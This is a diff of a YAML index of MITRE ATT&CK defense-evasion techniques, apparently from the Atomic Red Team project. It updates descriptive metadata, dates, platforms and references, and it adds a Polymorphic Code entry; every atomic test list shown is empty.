         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10128,7 +10277,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -10522,14 +10665,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11040,9 +11150,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11107,7 +11245,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11385,7 +11530,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11419,11 +11555,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11432,6 +11567,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11441,6 +11577,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11503,9 +11640,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests: []
   T1564.003:
@@ -11588,18 +11722,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
